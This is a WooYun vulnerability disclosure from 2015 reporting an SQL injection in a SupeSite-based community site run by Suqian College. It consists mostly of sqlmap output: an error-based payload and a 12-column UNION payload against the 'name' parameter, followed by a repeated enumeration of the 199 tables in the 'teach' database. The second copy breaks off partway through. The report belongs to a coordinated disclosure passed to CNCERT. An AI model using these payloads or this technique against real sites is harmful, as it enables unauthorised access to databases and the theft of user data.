宿迁学院交流网SQL注入 | wooyun-2015-0133131| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133131

漏洞标题：宿迁学院交流网SQL注入

漏洞作者：路人甲

提交时间：2015-08-12 17:22

修复时间：2015-09-27 15:30

公开时间：2015-09-27 15:30

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-12：细节已通知厂商并且等待厂商处理中
2015-08-13： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-23：细节向核心白帽子及相关领域专家公开
2015-09-02：细节向普通白帽子公开
2015-09-12：细节向实习白帽子公开
2015-09-27：细节向公众公开

简要描述：

详细说明：

http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments%20where%201=2
supesite 注入

Place: GET
Parameter: name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x7170697071,(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 0 END)),0x7177656571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tgVB
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: action=modelquote&cid=1&name=spacecomments where 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170697071,0x6543795173576a5a516f,0x7177656571),NULL,NULL,NULL,NULL,NULL,NULL#
---
[08:26:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[08:26:00] [INFO] fetching tables for database: 'teach'
[08:26:04] [WARNING] reflective value(s) found and filtering out
[08:26:04] [WARNING] the SQL query provided does not return any output
[08:26:04] [INFO] the SQL query used returns 210 entries
[08:26:05] [INFO] retrieved: [Table]access
[08:26:05] [INFO] retrieved: [Table]activities
[08:26:06] [INFO] retrieved: [Table]activityapplies
[08:26:07] [INFO] retrieved: [Table]addons
[08:26:07] [INFO] retrieved: [Table]adminactions
[08:26:08] [INFO] retrieved: [Table]admincustom
[08:26:09] [INFO] retrieved: [Table]admingroups
[08:26:09] [INFO] retrieved: [Table]adminnotes
[08:26:09] [INFO] retrieved: [Table]adminsessions
[08:26:09] [INFO] retrieved: [Table]advertisements
[08:26:09] [INFO] retrieved: [Table]announcements
[08:26:12] [INFO] retrieved: [Table]attachmentfields
[08:26:12] [INFO] retrieved: [Table]attachments
[08:26:12] [INFO] retrieved: [Table]attachpaymentlog
[08:26:13] [INFO] retrieved: [Table]attachtypes
[08:26:13] [INFO] retrieved: [Table]banned
[08:26:14] [INFO] retrieved: [Table]bbcodes
[08:26:15] [INFO] retrieved: [Table]caches
[08:26:15] [INFO] retrieved: [Table]creditslog
[08:26:15] [INFO] retrieved: [Table]crons
[08:26:15] [INFO] retrieved: [Table]debateposts
[08:26:15] [INFO] retrieved: [Table]debates
[08:26:16] [INFO] retrieved: [Table]failedlogins
[08:26:17] [INFO] retrieved: [Table]faqs
[08:26:18] [INFO] retrieved: [Table]favoriteforums
[08:26:18] [INFO] retrieved: [Table]favorites
[08:26:18] [INFO] retrieved: [Table]favoritethreads
[08:26:18] [INFO] retrieved: [Table]feeds
[08:26:18] [INFO] retrieved: [Table]forumfields
[08:26:18] [INFO] retrieved: [Table]forumlinks
[08:26:19] [INFO] retrieved: [Table]forumrecommend
[08:26:19] [INFO] retrieved: [Table]forums
[08:26:19] [INFO] retrieved: [Table]imagetypes
[08:26:20] [INFO] retrieved: [Table]invites
[08:26:20] [INFO] retrieved: [Table]itempool
[08:26:20] [INFO] retrieved: [Table]magiclog
[08:26:20] [INFO] retrieved: [Table]magicmarket
[08:26:20] [INFO] retrieved: [Table]magics
[08:26:21] [INFO] retrieved: [Table]medallog
[08:26:21] [INFO] retrieved: [Table]medals
[08:26:22] [INFO] retrieved: [Table]memberfields
[08:26:22] [INFO] retrieved: [Table]membermagics
[08:26:25] [INFO] retrieved: [Table]memberrecommend
[08:26:26] [INFO] retrieved: [Table]members
[08:26:27] [INFO] retrieved: [Table]memberspaces
[08:26:27] [INFO] retrieved: [Table]moderators
[08:26:29] [INFO] retrieved: [Table]modworks
[08:26:29] [INFO] retrieved: [Table]myposts
[08:26:36] [INFO] retrieved: [Table]mytasks
[08:26:36] [INFO] retrieved: [Table]mythreads
[08:26:37] [INFO] retrieved: [Table]navs
[08:26:37] [INFO] retrieved: [Table]onlinelist
[08:26:37] [INFO] retrieved: [Table]onlinetime
[08:26:37] [INFO] retrieved: [Table]orders
[08:26:38] [INFO] retrieved: [Table]paymentlog
[08:26:38] [INFO] retrieved: [Table]pluginhooks
[08:26:39] [INFO] retrieved: [Table]plugins
[08:26:39] [INFO] retrieved: [Table]pluginvars
[08:26:39] [INFO] retrieved: [Table]polloptions
[08:26:40] [INFO] retrieved: [Table]polls
[08:26:40] [INFO] retrieved: [Table]postposition
[08:26:40] [INFO] retrieved: [Table]posts
[08:26:40] [INFO] retrieved: [Table]profilefields
[08:26:41] [INFO] retrieved: [Table]projects
[08:26:41] [INFO] retrieved: [Table]promotions
[08:26:42] [INFO] retrieved: [Table]prompt
[08:26:43] [INFO] retrieved: [Table]promptmsgs
[08:26:43] [INFO] retrieved: [Table]prompttype
[08:26:43] [INFO] retrieved: [Table]ranks
[08:26:43] [INFO] retrieved: [Table]ratelog
[08:26:43] [INFO] retrieved: [Table]regips
[08:26:51] [INFO] retrieved: [Table]relatedthreads
[08:26:51] [INFO] retrieved: [Table]reportlog
[08:26:51] [INFO] retrieved: [Table]request
[08:26:51] [INFO] retrieved: [Table]rewardlog
[08:26:54] [INFO] retrieved: [Table]rsscaches
[08:26:54] [INFO] retrieved: [Table]searchindex
[08:26:54] [INFO] retrieved: [Table]sessions
[08:26:54] [INFO] retrieved: [Table]settings
[08:26:56] [INFO] retrieved: [Table]smilies
[08:26:56] [INFO] retrieved: [Table]spacecaches
[08:26:56] [INFO] retrieved: [Table]stats
[08:26:56] [INFO] retrieved: [Table]statvars
[08:26:57] [INFO] retrieved: [Table]styles
[08:26:57] [INFO] retrieved: [Table]stylevars
[08:26:58] [INFO] retrieved: [Table]tags
[08:26:59] [INFO] retrieved: [Table]tasks
[08:27:00] [INFO] retrieved: [Table]taskvars
[08:27:00] [INFO] retrieved: [Table]templates
[08:27:00] [INFO] retrieved: [Table]threads
[08:27:00] [INFO] retrieved: [Table]threadsmod
[08:27:00] [INFO] retrieved: [Table]threadtags
[08:27:00] [INFO] retrieved: [Table]threadtypes
[08:27:00] [INFO] retrieved: [Table]tradecomments
[08:27:03] [INFO] retrieved: [Table]tradelog
[08:27:04] [INFO] retrieved: [Table]tradeoptionvars
[08:27:05] [INFO] retrieved: [Table]trades
[08:27:06] [INFO] retrieved: [Table]typemodels
[08:27:06] [INFO] retrieved: [Table]typeoptions
[08:27:09] [INFO] retrieved: [Table]typeoptionvars
[08:27:10] [INFO] retrieved: [Table]typevars
[08:27:10] [INFO] retrieved: [Table]usergroups
[08:27:10] [INFO] retrieved: [Table]validating
[08:27:11] [INFO] retrieved: [Table]warnings
[08:27:11] [INFO] retrieved: [Table]words
[08:27:12] [INFO] retrieved: [Table]ads
[08:27:12] [INFO] retrieved: [Table]announcements
[08:27:12] [INFO] retrieved: [Table]attachments
[08:27:12] [INFO] retrieved: [Table]attachmenttypes
[08:27:12] [INFO] retrieved: [Table]blocks
[08:27:12] [INFO] retrieved: [Table]cache
[08:27:13] [INFO] retrieved: [Table]cache_0
[08:27:13] [INFO] retrieved: [Table]cache_1
[08:27:13] [INFO] retrieved: [Table]cache_2
[08:27:14] [INFO] retrieved: [Table]cache_3
[08:27:14] [INFO] retrieved: [Table]cache_4
[08:27:14] [INFO] retrieved: [Table]cache_5
[08:27:14] [INFO] retrieved: [Table]cache_6
[08:27:14] [INFO] retrieved: [Table]cache_7
[08:27:15] [INFO] retrieved: [Table]cache_8
[08:27:16] [INFO] retrieved: [Table]cache_9
[08:27:19] [INFO] retrieved: [Table]cache_a
[08:27:19] [INFO] retrieved: [Table]cache_b
[08:27:19] [INFO] retrieved: [Table]cache_c
[08:27:19] [INFO] retrieved: [Table]cache_d
[08:27:20] [INFO] retrieved: [Table]cache_e
[08:27:20] [INFO] retrieved: [Table]cache_f
[08:27:21] [INFO] retrieved: [Table]categories
[08:27:21] [INFO] retrieved: [Table]channels
[08:27:21] [INFO] retrieved: [Table]corpus
[08:27:21] [INFO] retrieved: [Table]crons
[08:27:21] [INFO] retrieved: [Table]customfields
[08:27:22] [INFO] retrieved: [Table]effects
[08:27:22] [INFO] retrieved: [Table]favorites
[08:27:22] [INFO] retrieved: [Table]friendlinks
[08:27:23] [INFO] retrieved: [Table]friends
[08:27:23] [INFO] retrieved: [Table]goodsprice
[08:27:23] [INFO] retrieved: [Table]groupfields
[08:27:24] [INFO] retrieved: [Table]groupinvite
[08:27:31] [INFO] retrieved: [Table]groupitems
[08:27:31] [INFO] retrieved: [Table]groups
[08:27:31] [INFO] retrieved: [Table]groupuid
[08:27:38] [INFO] retrieved: [Table]guestbooks
[08:27:39] [INFO] retrieved: [Table]itemtypes
[08:27:39] [INFO] retrieved: [Table]members
[08:27:39] [INFO] retrieved: [Table]modelcolumns
[08:27:39] [INFO] retrieved: [Table]modelinterval
[08:27:39] [INFO] retrieved: [Table]modelperm
[08:27:39] [INFO] retrieved: [Table]models
[08:27:39] [INFO] retrieved: [Table]polls
[08:27:39] [INFO] retrieved: [Table]prefields
[08:27:40] [INFO] retrieved: [Table]reports
[08:27:41] [INFO] retrieved: [Table]robotitems
[08:27:41] [INFO] retrieved: [Table]robotlog
[08:27:42] [INFO] retrieved: [Table]robotmessages
[08:27:43] [INFO] retrieved: [Table]robots
[08:27:43] [INFO] retrieved: [Table]rss
[08:27:43] [INFO] retrieved: [Table]settings
[08:27:43] [INFO] retrieved: [Table]sitemaplogs
[08:27:45] [INFO] retrieved: [Table]spaceblogs
[08:27:45] [INFO] retrieved: [Table]spacecache
[08:27:45] [INFO] retrieved: [Table]spacecache10
[08:27:45] [INFO] retrieved: [Table]spacecache2
[08:27:45] [INFO] retrieved: [Table]spacecache3
[08:27:46] [INFO] retrieved: [Table]spacecache4
[08:27:47] [INFO] retrieved: [Table]spacecache5
[08:27:54] [INFO] retrieved: [Table]spacecache6
[08:27:55] [INFO] retrieved: [Table]spacecache7
[08:27:56] [INFO] retrieved: [Table]spacecache8
[08:27:56] [INFO] retrieved: [Table]spacecache9
[08:27:59] [INFO] retrieved: [Table]spacecomments
[08:28:00] [INFO] retrieved: [Table]spacefiles
[08:28:00] [INFO] retrieved: [Table]spacegoods
[08:28:00] [INFO] retrieved: [Table]spaceimages
[08:28:00] [INFO] retrieved: [Table]spaceitems
[08:28:01] [INFO] retrieved: [Table]spacelinks
[08:28:01] [INFO] retrieved: [Table]spacenews
[08:28:01] [INFO] retrieved: [Table]spacetags
[08:28:01] [INFO] retrieved: [Table]spacevideos
[08:28:01] [INFO] retrieved: [Table]styles
[08:28:01] [INFO] retrieved: [Table]tagcache
[08:28:01] [INFO] retrieved: [Table]tagcache_0
[08:28:01] [INFO] retrieved: [Table]tagcache_1
[08:28:02] [INFO] retrieved: [Table]tagcache_2
[08:28:03] [INFO] retrieved: [Table]tagcache_3
[08:28:03] [INFO] retrieved: [Table]tagcache_4
[08:28:10] [INFO] retrieved: [Table]tagcache_5
[08:28:10] [INFO] retrieved: [Table]tagcache_6
[08:28:10] [INFO] retrieved: [Table]tagcache_7
[08:28:10] [INFO] retrieved: [Table]tagcache_8
[08:28:10] [INFO] retrieved: [Table]tagcache_9
[08:28:10] [INFO] retrieved: [Table]tagcache_a
[08:28:11] [INFO] retrieved: [Table]tagcache_b
[08:28:12] [INFO] retrieved: [Table]tagcache_c
[08:28:12] [INFO] retrieved: [Table]tagcache_d
[08:28:12] [INFO] retrieved: [Table]tagcache_e
[08:28:12] [INFO] retrieved: [Table]tagcache_f
[08:28:12] [INFO] retrieved: [Table]tags
[08:28:19] [INFO] retrieved: [Table]topicelements
[08:28:20] [INFO] retrieved: [Table]topics
[08:28:24] [INFO] retrieved: [Table]tracks
[08:28:25] [INFO] retrieved: [Table]usercss
[08:28:25] [INFO] retrieved: [Table]userfields
[08:28:25] [INFO] retrieved: [Table]usergroups
[08:28:25] [INFO] retrieved: [Table]userlinks
[08:28:25] [INFO] retrieved: [Table]userprofile
[08:28:26] [INFO] retrieved: [Table]userspacefields
[08:28:28] [INFO] retrieved: [Table]userspaces
[08:28:28] [INFO] retrieved: [Table]visitors
[08:28:28] [INFO] retrieved: [Table]words
Database: teach
[199 tables]
+-------------------------+
| [Table]access           |
| [Table]activities       |
| [Table]activityapplies  |
| [Table]addons           |
| [Table]adminactions     |
| [Table]admincustom      |
| [Table]admingroups      |
| [Table]adminnotes       |
| [Table]adminsessions    |
| [Table]ads              |
| [Table]advertisements   |
| [Table]announcements    |
| [Table]attachmentfields |
| [Table]attachments      |
| [Table]attachmenttypes  |
| [Table]attachpaymentlog |
| [Table]attachtypes      |
| [Table]banned           |
| [Table]bbcodes          |
| [Table]blocks           |
| [Table]cache_0          |
| [Table]cache_1          |
| [Table]cache_2          |
| [Table]cache_3          |
| [Table]cache_4          |
| [Table]cache_5          |
| [Table]cache_6          |
| [Table]cache_7          |
| [Table]cache_8          |
| [Table]cache_9          |
| [Table]cache_a          |
| [Table]cache_b          |
| [Table]cache_c          |
| [Table]cache_d          |
| [Table]cache_e          |
| [Table]cache_f          |
| [Table]cache            |
| [Table]caches           |
| [Table]categories       |
| [Table]channels         |
| [Table]corpus           |
| [Table]creditslog       |
| [Table]crons            |
| [Table]customfields     |
| [Table]debateposts      |
| [Table]debates          |
| [Table]effects          |
| [Table]failedlogins     |
| [Table]faqs             |
| [Table]favoriteforums   |
| [Table]favorites        |
| [Table]favoritethreads  |
| [Table]feeds            |
| [Table]forumfields      |
| [Table]forumlinks       |
| [Table]forumrecommend   |
| [Table]forums           |
| [Table]friendlinks      |
| [Table]friends          |
| [Table]goodsprice       |
| [Table]groupfields      |
| [Table]groupinvite      |
| [Table]groupitems       |
| [Table]groups           |
| [Table]groupuid         |
| [Table]guestbooks       |
| [Table]imagetypes       |
| [Table]invites          |
| [Table]itempool         |
| [Table]itemtypes        |
| [Table]magiclog         |
| [Table]magicmarket      |
| [Table]magics           |
| [Table]medallog         |
| [Table]medals           |
| [Table]memberfields     |
| [Table]membermagics     |
| [Table]memberrecommend  |
| [Table]members          |
| [Table]memberspaces     |
| [Table]modelcolumns     |
| [Table]modelinterval    |
| [Table]modelperm        |
| [Table]models           |
| [Table]moderators       |
| [Table]modworks         |
| [Table]myposts          |
| [Table]mytasks          |
| [Table]mythreads        |
| [Table]navs             |
| [Table]onlinelist       |
| [Table]onlinetime       |
| [Table]orders           |
| [Table]paymentlog       |
| [Table]pluginhooks      |
| [Table]plugins          |
| [Table]pluginvars       |
| [Table]polloptions      |
| [Table]polls            |
| [Table]postposition     |
| [Table]posts            |
| [Table]prefields        |
| [Table]profilefields    |
| [Table]projects         |
| [Table]promotions       |
| [Table]prompt           |
| [Table]promptmsgs       |
| [Table]prompttype       |
| [Table]ranks            |
| [Table]ratelog          |
| [Table]regips           |
| [Table]relatedthreads   |
| [Table]reportlog        |
| [Table]reports          |
| [Table]request          |
| [Table]rewardlog        |
| [Table]robotitems       |
| [Table]robotlog         |
| [Table]robotmessages    |
| [Table]robots           |
| [Table]rss              |
| [Table]rsscaches        |
| [Table]searchindex      |
| [Table]sessions         |
| [Table]settings         |
| [Table]sitemaplogs      |
| [Table]smilies          |
| [Table]spaceblogs       |
| [Table]spacecache10     |
| [Table]spacecache2      |
| [Table]spacecache3      |
| [Table]spacecache4      |
| [Table]spacecache5      |
| [Table]spacecache6      |
| [Table]spacecache7      |
| [Table]spacecache8      |
| [Table]spacecache9      |
| [Table]spacecache       |
| [Table]spacecaches      |
| [Table]spacecomments    |
| [Table]spacefiles       |
| [Table]spacegoods       |
| [Table]spaceimages      |
| [Table]spaceitems       |
| [Table]spacelinks       |
| [Table]spacenews        |
| [Table]spacetags        |
| [Table]spacevideos      |
| [Table]stats            |
| [Table]statvars         |
| [Table]styles           |
| [Table]stylevars        |
| [Table]tagcache_0       |
| [Table]tagcache_1       |
| [Table]tagcache_2       |
| [Table]tagcache_3       |
| [Table]tagcache_4       |
| [Table]tagcache_5       |
| [Table]tagcache_6       |
| [Table]tagcache_7       |
| [Table]tagcache_8       |
| [Table]tagcache_9       |
| [Table]tagcache_a       |
| [Table]tagcache_b       |
| [Table]tagcache_c       |
| [Table]tagcache_d       |
| [Table]tagcache_e       |
| [Table]tagcache_f       |
| [Table]tagcache         |
| [Table]tags             |
| [Table]tasks            |
| [Table]taskvars         |
| [Table]templates        |
| [Table]threads          |
| [Table]threadsmod       |
| [Table]threadtags       |
| [Table]threadtypes      |
| [Table]topicelements    |
| [Table]topics           |
| [Table]tracks           |
| [Table]tradecomments    |
| [Table]tradelog         |
| [Table]tradeoptionvars  |
| [Table]trades           |
| [Table]typemodels       |
| [Table]typeoptions      |
| [Table]typeoptionvars   |
| [Table]typevars         |
| [Table]usercss          |
| [Table]userfields       |
| [Table]usergroups       |
| [Table]userlinks        |
| [Table]userprofile      |
| [Table]userspacefields  |
| [Table]userspaces       |
| [Table]validating       |
| [Table]visitors         |
| [Table]warnings         |
| [Table]words            |
+-------------------------+

漏洞证明：

Place: GET
Parameter: name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x7170697071,(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 0 END)),0x7177656571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tgVB
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: action=modelquote&cid=1&name=spacecomments where 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170697071,0x6543795173576a5a516f,0x7177656571),NULL,NULL,NULL,NULL,NULL,NULL#
---
[08:26:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[08:26:00] [INFO] fetching tables for database: 'teach'
[08:26:04] [WARNING] reflective value(s) found and filtering out
[08:26:04] [WARNING] the SQL query provided does not return any output
[08:26:04] [INFO] the SQL query used returns 210 entries
[08:26:05] [INFO] retrieved: [Table]access
[08:26:05] [INFO] retrieved: [Table]activities
[08:26:06] [INFO] retrieved: [Table]activityapplies
[08:26:07] [INFO] retrieved: [Table]addons
[08:26:07] [INFO] retrieved: [Table]adminactions
[08:26:08] [INFO] retrieved: [Table]admincustom
[08:26:09] [INFO] retrieved: [Table]admingroups
[08:26:09] [INFO] retrieved: [Table]adminnotes
[08:26:09] [INFO] retrieved: [Table]adminsessions
[08:26:09] [INFO] retrieved: [Table]advertisements
[08:26:09] [INFO] retrieved: [Table]announcements
[08:26:12] [INFO] retrieved: [Table]attachmentfields
[08:26:12] [INFO] retrieved: [Table]attachments
[08:26:12] [INFO] retrieved: [Table]attachpaymentlog
[08:26:13] [INFO] retrieved: [Table]attachtypes
[08:26:13] [INFO] retrieved: [Table]banned
[08:26:14] [INFO] retrieved: [Table]bbcodes
[08:26:15] [INFO] retrieved: [Table]caches
[08:26:15] [INFO] retrieved: [Table]creditslog
[08:26:15] [INFO] retrieved: [Table]crons
[08:26:15] [INFO] retrieved: [Table]debateposts
[08:26:15] [INFO] retrieved: [Table]debates
[08:26:16] [INFO] retrieved: [Table]failedlogins
[08:26:17] [INFO] retrieved: [Table]faqs
[08:26:18] [INFO] retrieved: [Table]favoriteforums
[08:26:18] [INFO] retrieved: [Table]favorites
[08:26:18] [INFO] retrieved: [Table]favoritethreads
[08:26:18] [INFO] retrieved: [Table]feeds
[08:26:18] [INFO] retrieved: [Table]forumfields
[08:26:18] [INFO] retrieved: [Table]forumlinks
[08:26:19] [INFO] retrieved: [Table]forumrecommend
[08:26:19] [INFO] retrieved: [Table]forums
[08:26:19] [INFO] retrieved: [Table]imagetypes
[08:26:20] [INFO] retrieved: [Table]invites
[08:26:20] [INFO] retrieved: [Table]itempool
[08:26:20] [INFO] retrieved: [Table]magiclog
[08:26:20] [INFO] retrieved: [Table]magicmarket
[08:26:20] [INFO] retrieved: [Table]magics
[08:26:21] [INFO] retrieved: [Table]medallog
[08:26:21] [INFO] retrieved: [Table]medals
[08:26:22] [INFO] retrieved: [Table]memberfields
[08:26:22] [INFO] retrieved: [Table]membermagics
[08:26:25] [INFO] retrieved: [Table]memberrecommend
[08:26:26] [INFO] retrieved: [Table]members
[08:26:27] [INFO] retrieved: [Table]memberspaces
[08:26:27] [INFO] retrieved: [Table]moderators
[08:26:29] [INFO] retrieved: [Table]modworks
[08:26:29] [INFO] retrieved: [Table]myposts
[08:26:36] [INFO] retrieved: [Table]mytasks
[08:26:36] [INFO] retrieved: [Table]mythreads
[08:26:37] [INFO] retrieved: [Table]navs
[08:26:37] [INFO] retrieved: [Table]onlinelist
[08:26:37] [INFO] retrieved: [Table]onlinetime
[08:26:37] [INFO] retrieved: [Table]orders
[08:26:38] [INFO] retrieved: [Table]paymentlog
[08:26:38] [INFO] retrieved: [Table]pluginhooks
[08:26:39] [INFO] retrieved: [Table]plugins
[08:26:39] [INFO] retrieved: [Table]pluginvars
[08:26:39] [INFO] retrieved: [Table]polloptions
[08:26:40] [INFO] retrieved: [Table]polls
[08:26:40] [INFO] retrieved: [Table]postposition
[08:26:40] [INFO] retrieved: [Table]posts
[08:26:40] [INFO] retrieved: [Table]profilefields
[08:26:41] [INFO] retrieved: [Table]projects
[08:26:41] [INFO] retrieved: [Table]promotions
[08:26:42] [INFO] retrieved: [Table]prompt
[08:26:43] [INFO] retrieved: [Table]promptmsgs
[08:26:43] [INFO] retrieved: [Table]prompttype
[08:26:43] [INFO] retrieved: [Table]ranks
[08:26:43] [INFO] retrieved: [Table]ratelog
[08:26:43] [INFO] retrieved: [Table]regips
[08:26:51] [INFO] retrieved: [Table]relatedthreads
[08:26:51] [INFO] retrieved: [Table]reportlog
[08:26:51] [INFO] retrieved: [Table]request
[08:26:51] [INFO] retrieved: [Table]rewardlog
[08:26:54] [INFO] retrieved: [Table]rsscaches
[08:26:54] [INFO] retrieved: [Table]searchindex
[08:26:54] [INFO] retrieved: [Table]sessions
[08:26:54] [INFO] retrieved: [Table]settings
[08:26:56] [INFO] retrieved: [Table]smilies
[08:26:56] [INFO] retrieved: [Table]spacecaches
[08:26:56] [INFO] retrieved: [Table]stats
[08:26:56] [INFO] retrieved: [Table]statvars
[08:26:57] [INFO] retrieved: [Table]styles
[08:26:57] [INFO] retrieved: [Table]stylevars
[08:26:58] [INFO] retrieved: [Table]tags
[08:26:59] [INFO] retrieved: [Table]tasks
[08:27:00] [INFO] retrieved: [Table]taskvars
[08:27:00] [INFO] retrieved: [Table]templates
[08:27:00] [INFO] retrieved: [Table]threads
[08:27:00] [INFO] retrieved: [Table]threadsmod
[08:27:00] [INFO] retrieved: [Table]threadtags
[08:27:00] [INFO] retrieved: [Table]threadtypes
[08:27:00] [INFO] retrieved: [Table]tradecomments
[08:27:03] [INFO] retrieved: [Table]tradelog
[08:27:04] [INFO] retrieved: [Table]tradeoptionvars
[08:27:05] [INFO] retrieved: [Table]trades
[08:27:06] [INFO] retrieved: [Table]typemodels
[08:27:06] [INFO] retrieved: [Table]typeoptions
[08:27:09] [INFO] retrieved: [Table]typeoptionvars
[08:27:10] [INFO] retrieved: [Table]typevars
[08:27:10] [INFO] retrieved: [Table]usergroups
[08:27:10] [INFO] retrieved: [Table]validating
[08:27:11] [INFO] retrieved: [Table]warnings
[08:27:11] [INFO] retrieved: [Table]words
[08:27:12] [INFO] retrieved: [Table]ads
[08:27:12] [INFO] retrieved: [Table]announcements
[08:27:12] [INFO] retrieved: [Table]attachments
[08:27:12] [INFO] retrieved: [Table]attachmenttypes
[08:27:12] [INFO] retrieved: [Table]blocks
[08:27:12] [INFO] retrieved: [Table]cache
[08:27:13] [INFO] retrieved: [Table]cache_0
[08:27:13] [INFO] retrieved: [Table]cache_1
[08:27:13] [INFO] retrieved: [Table]cache_2
[08:27:14] [INFO] retrieved: [Table]cache_3
[08:27:14] [INFO] retrieved: [Table]cache_4
[08:27:14] [INFO] retrieved: [Table]cache_5
[08:27:14] [INFO] retrieved: [Table]cache_6
[08:27:14] [INFO] retrieved: [Table]cache_7
[08:27:15] [INFO] retrieved: [Table]cache_8
[08:27:16] [INFO] retrieved: [Table]cache_9
[08:27:19] [INFO] retrieved: [Table]cache_a
[08:27:19] [INFO] retrieved: [Table]cache_b
[08:27:19] [INFO] retrieved: [Table]cache_c
[08:27:19] [INFO] retrieved: [Table]cache_d
[08:27:20] [INFO] retrieved: [Table]cache_e
[08:27:20] [INFO] retrieved: [Table]cache_f
[08:27:21] [INFO] retrieved: [Table]categories
[08:27:21] [INFO] retrieved: [Table]channels
[08:27:21] [INFO] retrieved: [Table]corpus
[08:27:21] [INFO] retrieved: [Table]crons
[08:27:21] [INFO] retrieved: [Table]customfields
[08:27:22] [INFO] retrieved: [Table]effects
[08:27:22] [INFO] retrieved: [Table]favorites
[08:27:22] [INFO] retrieved: [Table]friendlinks
[08:27:23] [INFO] retrieved: [Table]friends
[08:27:23] [INFO] retrieved: [Table]goodsprice
[08:27:23] [INFO] retrieved: [Table]groupfields
[08:27:24] [INFO] retrieved: [Table]groupinvite
[08:27:31] [INFO] retrieved: [Table]groupitems
[08:27:31] [INFO] retrieved: [Table]groups
[08:27:31] [INFO] retrieved: [Table]groupuid
[08:27:38] [INFO] retrieved: [Table]guestbooks
[08:27:39] [INFO] retrieved: [Table]itemtypes
[08:27:39] [INFO] retrieved: [Table]members
[08:27:39] [INFO] retrieved: [Table]modelcolumns
[08:27:39] [INFO] retrieved: [Table]modelinterval
[08:27:39] [INFO] retrieved: [Table]modelperm
[08:27:39] [INFO] retrieved: [Table]models
[08:27:39] [INFO] retrieved: [Table]polls
[08:27:39] [INFO] retrieved: [Table]prefields
[08:27:40] [INFO] retrieved: [Table]reports
[08:27:41] [INFO] retrieved: [Table]robotitems
[08:27:41] [INFO] retrieved: [Table]robotlog
[08:27:42] [INFO] retrieved: [Table]robotmessages
[08:27:43] [INFO] retrieved: [Table]robots
[08:27:43] [INFO] retrieved: [Table]rss
[08:27:43] [INFO] retrieved: [Table]settings
[08:27:43] [INFO] retrieved: [Table]sitemaplogs
[08:27:45] [INFO] retrieved: [Table]spaceblogs
[08:27:45] [INFO] retrieved: [Table]spacecache
[08:27:45] [INFO] retrieved: [Table]spacecache10
[08:27:45] [INFO] retrieved: [Table]spacecache2
[08:27:45] [INFO] retrieved: [Table]spacecache3
[08:27:46] [INFO] retrieved: [Table]spacecache4
[08:27:47] [INFO] retrieved: [Table]spacecache5
[08:27:54] [INFO] retrieved: [Table]spacecache6
[08:27:55] [INFO] retrieved: [Table]spacecache7
[08:27:56] [INFO] retrieved: [Table]spacecache8
[08:27:56] [INFO] retrieved: [Table]spacecache9
[08:27:59] [INFO] retrieved: [Table]spacecomments
[08:28:00] [INFO] retrieved: [Table]spacefiles
[08:28:00] [INFO] retrieved: [Table]spacegoods
[08:28:00] [INFO] retrieved: [Table]spaceimages
[08:28:00] [INFO] retrieved: [Table]spaceitems
[08:28:01] [INFO] retrieved: [Table]spacelinks
[08:28:01] [INFO] retrieved: [Table]spacenews
[08:28:01] [INFO] retrieved: [Table]spacetags
[08:28:01] [INFO] retrieved: [Table]spacevideos
[08:28:01] [INFO] retrieved: [Table]styles
[08:28:01] [INFO] retrieved: [Table]tagcache
[08:28:01] [INFO] retrieved: [Table]tagcache_0
[08:28:01] [INFO] retrieved: [Table]tagcache_1
[08:28:02] [INFO] retrieved: [Table]tagcache_2
[08:28:03] [INFO] retrieved: [Table]tagcache_3
[08:28:03] [INFO] retrieved: [Table]tagcache_4
[08:28:10] [INFO] retrieved: [Table]tagcache_5
[08:28:10] [INFO] retrieved: [Table]tagcache_6
[08:28:10] [INFO] retrieved: [Table]tagcache_7
[08:28:10] [INFO] retrieved: [Table]tagcache_8
[08:28:10] [INFO] retrieved: [Table]tagcache_9
[08:28:10] [INFO] retrieved: [Table]tagcache_a
[08:28:11] [INFO] retrieved: [Table]tagcache_b
[08:28:12] [INFO] retrieved: [Table]tagcache_c
[08:28:12] [INFO] retrieved: [Table]tagcache_d
[08:28:12] [INFO] retrieved: [Table]tagcache_e
[08:28:12] [INFO] retrieved: [Table]tagcache_f
[08:28:12] [INFO] retrieved: [Table]tags
[08:28:19] [INFO] retrieved: [Table]topicelements
[08:28:20] [INFO] retrieved: [Table]topics
[08:28:24] [INFO] retrieved: [Table]tracks
[08:28:25] [INFO] retrieved: [Table]usercss
[08:28:25] [INFO] retrieved: [Table]userfields
[08:28:25] [INFO] retrieved: [Table]usergroups
[08:28:25] [INFO] retrieved: [Table]userlinks
[08:28:25] [INFO] retrieved: [Table]userprofile
[08:28:26] [INFO] retrieved: [Table]userspacefields
[08:28:28] [INFO] retrieved: [Table]userspaces
[08:28:28] [INFO] retrieved: [Table]visitors
[08:28:28] [INFO] retrieved: [Table]words
Database: teach
[199 tables]
+-------------------------+
| [Table]access           |
| [Table]activities       |
| [Table]activityapplies  |
| [Table]addons           |
| [Table]adminactions     |
